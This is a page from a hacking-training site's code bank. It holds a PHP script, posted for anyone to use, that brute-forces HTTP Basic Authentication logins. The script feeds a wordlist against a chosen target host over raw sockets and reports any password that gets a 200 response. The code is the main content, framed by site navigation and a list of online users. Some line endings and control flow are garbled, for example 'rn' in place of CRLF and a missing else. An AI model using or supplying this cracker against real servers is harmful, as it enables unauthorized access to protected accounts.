EG Information

Main Index
EG Manual
Disclaimer
Legal Information
Hall of Fame
Hall of Shame
Member Rankings
Members List
Meet the Staff

Training Missions

Read Me First New
Basic Skills
Realistic Scenarios
Cryptography
Software Cracking
Linux ELF Binary Cracking
Logical Thinking
Programming
Patching
Steganography
Deface This Wall
/dev/null
/dev/urandom

Knowledge Bank

Discussion Forums
Enigma Chat New
RSS Feeds RSS
Articles / Tutorials
Videos
Online EG MP3 Player Radio
Enigma Zine
Downloads
Tools New

Code Resources

Submit Code
Ajax
ASM
Bash
C
CPP
Csharp
Delphi
Haskell
Java
Javascript
Jython
Lisp
mIRC
MySQL
Perl
PHP
Python
QBASIC
VisualBasic

Hakipedia: An open collaborative for all your information security needs.

The Urinal

Click Here To Vote For EG!

Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site.

enigma group

enigma group

enigma group

enigma group

Enigma Group's Code Bank


Basic auth password craker (sockets)

By: mofm  -  Date Submitted: 2009-05-31 07:02:08

  1. <?php
  2.  
  3. /*
  4.  
  5.  * Mofms password cracker used to crack basic auth passwords
  6.  * Enjoy Edit distribute as you please ... but its polite to leave my name in it. :).
  7.  
  8.  * Mofm
  9.  
  10.  * usage: crack.php <password file> <username> <pasue per attempt> <interval> <target> <port>
  11.  
  12. */
  13.  
  14.  
  15.  
  16. function sendrequest($site,$password,$username,$socket,$dir)
  17.  
  18. {
  19.  
  20.  
  21.  
  22. $data = "HEAD /$dir HTTP/1.1rn";
  23.  
  24. $data .= "Host: $sitern";
  25.  
  26. $data .= "Authorization: Basic ".base64_encode("$username:$password")."rnrn";
  27.  
  28. $reply = '';
  29.  
  30. socket_write($socket, $data, strlen($data));
  31.  
  32. $reply = socket_read($socket, 2048);
  33.  
  34.  
  35.  
  36. switch(substr($reply,9,3))
  37.  
  38. {
  39.  
  40. case 401:
  41.  
  42. return 0;
  43.  
  44.  
  45. case 200:
  46.  
  47. return 1;
  48.  
  49.  
  50. default;
  51.  
  52. }
  53.  
  54. }
  55.  
  56.  
  57.  
  58. function close($socket)
  59.  
  60. {
  61.  
  62. socket_close($socket);
  63.  
  64.  
  65.  
  66. }
  67.  
  68. $file =$argv[1];
  69.  
  70. $uname=$argv[2];
  71.  
  72. $sleep=$argv[3];
  73.  
  74. $interval=$argv[4];
  75.  
  76. $site=$argv[5];
  77.  
  78. $port=$argv[6];
  79.  
  80. $dir=$argv[7];
  81.  
  82. $fpfile= @fopen($file, 'r');
  83.  
  84. $inttest=0;
  85.  
  86. $counter=0;
  87.  
  88. if ($fpfile)
  89.  
  90. {
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98. while(!feof($fpfile))
  99.  
  100. {
  101.  
  102. $address = gethostbyname($site);
  103.  
  104. $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  105.  
  106. $result = socket_connect($socket, $address, $port);
  107.  
  108. $pass=trim(fgets($fpfile)); //password from file
  109.  
  110. if ($result==0)
  111.  
  112. {
  113.  
  114. exit("Connection Error/n/r");
  115.  
  116. }
  117.  
  118. if (sendrequest($site,$pass,$uname,$socket,$dir)==1) //see if we loged in
  119.  
  120. {
  121.  
  122. echo "!!Password Found!!nr"; //display password
  123.  
  124. echo "[$counter]$passnr";
  125.  
  126. close($socket);
  127.  
  128. exit();
  129.  
  130. }
  131.  
  132. if ($inttest == $interval)
  133.  
  134. {
  135.  
  136. echo "Trying[$counter]:$uname:$passn";
  137.  
  138. $inttest=0;
  139.  
  140. }
  141.  
  142. sleep($sleep); //time bettween attacks
  143.  
  144. $inttest++;
  145.  
  146. $counter++;
  147.  
  148. close($socket);
  149.  
  150.  
  151.  
  152. }
  153.  
  154.  
  155.  
  156. echo "Password was not in wordlist sorry n";
  157.  
  158. close($socket);
  159.  
  160. exit();
  161.  
  162.  
  163. {
  164.  
  165. echo "Error opening password file:$file.n";
  166.  
  167. exit();
  168.  
  169. }
  170.  
  171. ?>
  172.  
  173.  
Return to php category list

Who's Online

483 Guests, 101 Users
ckryptix, Ios, viper0i0, Diznablo, rabbidmind, asapong, Nasrudin, CollapsingWalls, mehtaparag, bitstrike, jnony, C, Nicid1, Nusquam-Redono-Sapientia, bazcrown, saifulfaizan, The End, Ultraminor, psychomarine, st3alth, themastersinner, pgmrlink, login, lionaneesh, ishkur88, mahraja, Mac, chekifr, gandalf88, Vap0r, t0ast, tantrum6226, BnE, Distorted, Psiber_Syn, Ausome1, invas10n, oldgoat, freedaysbecumei, BinaryShinigami, Rex_Mundi, Red_beard, Strobeflux, s0m3nak3dguy, Descent, teehee, machupicchu, Genetix, Anandarl, NotMyOwn, thegamerdude, Godzila, popo12341234, RedEvolution, velocity_b, myne17, teto111, aVoid, Central-Gsm, 1101, JackalReborn, InjectioN, h4lted, c0re, DisPater, markt4death, splatta, Jackowacko, saint556, Pyron2312, Azerion, howsens, white.hat.gone.bad, vazzilly, pwunkz, Inverted, QuarterCask, Infernoe11, deskata, cr4ck3rj4ck, Blizer, jasonmax, j0sh, gwenwavor, N4g4c3N, spizeyboy, Network X, Uino59, Jae Cee, ianFDK, saykov, medhaavee, zofy, demonkiller410, Stumble, SaMTHG, kishore, Raze, helasraizam, Venom1019, Jakabo